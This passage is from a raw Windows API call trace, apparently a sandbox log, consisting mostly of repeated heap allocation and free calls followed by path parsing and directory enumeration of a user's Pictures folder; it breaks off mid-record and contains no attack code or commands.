(HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.579] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\") returned="4HUb e9qKHwuKHz-\\" [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.579] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0235.579] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cec0 [0235.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.579] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325cec0 | out: hHeap=0x630000) returned 1 [0235.580] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.580] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.580] PathFindFileNameW (pszPath="") returned="" [0235.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.580] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0427a70, ftCreationTime.dwHighDateTime=0x1d5e07b, ftLastAccessTime.dwLowDateTime=0xbb0c1d90, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0xbb0c1d90, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.582] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0427a70, 